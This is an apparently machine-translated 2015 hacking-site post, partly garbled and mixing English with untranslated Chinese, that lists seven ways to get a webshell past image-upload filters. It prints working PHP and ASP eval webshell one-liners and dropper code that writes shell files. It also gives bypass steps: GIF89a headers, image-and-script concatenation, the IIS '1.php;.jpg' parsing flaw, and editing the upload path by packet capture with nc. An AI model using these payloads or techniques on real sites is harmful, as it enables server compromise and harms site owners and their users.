Upload pictures of the shell to bypass the filter of several methods-vulnerability warning-the black bar safety net

2015-02-02T00:00:00
ID MYHACK58:62201558690
Type myhack58
Reporter 佚名
Modified 2015-02-02T00:00:00

Description

General site picture upload function to the file filter, to prevent webshell written. But the different procedures of the filter are not the same, how to break through the filter to continue to upload?

This article summarizes seven methods that can break!

1, The file header+GIF89a law. (php//this is well understood, directly in the php horses up front to write the gif89a, the 然后 上传 dama.php

2, The use of edjpgcom tool to image the injected code. (php)//edjpgcom modified, 加入php一句话保存为dama.php

3, the cmd command copy 图片 .GIF+shell.php webshell.php (php) //is estimated and 1 is the same principle, 欺骗上传webshell.php

4, the C32asm open the picture in the end of the file with a space added to the code<? php eval($_POST[cmd])?& gt;. (php//populate the php Word and then upload.

5, in the 4 improved on the basis of the code<? php fputs(fopen(“error.php”.”w”).”& lt;? eval(\$_POST[cmd]);?& gt;”)?& gt;. (php)//same

目录 下 生成 error.php questions: asp of how to rewrite it?

Answer: asp test result is: no permissions...

<% Set MyFileObject=Server. CreateObject(“Scripting. FileSystemObject”) Set MyTextFile=MyFileObject. CreateTextFile(“kafei. asp”) MyTextFile. WriteLine(“\<\%eval request(chr(3 5))\%\>”) MyTextFile. Close %>

6, the IIS 解析 目录 名 漏洞 1.php;. jpg (jpg) //this is the filename variable is not filtered.

7, the nc capture change data //path name and the file name is not filtered.

//Via the packet-capture modify the upload path by/upload/1. asp+spaces, using the software to blank-padded to 0 0 to. Then nc submitted get webshell on.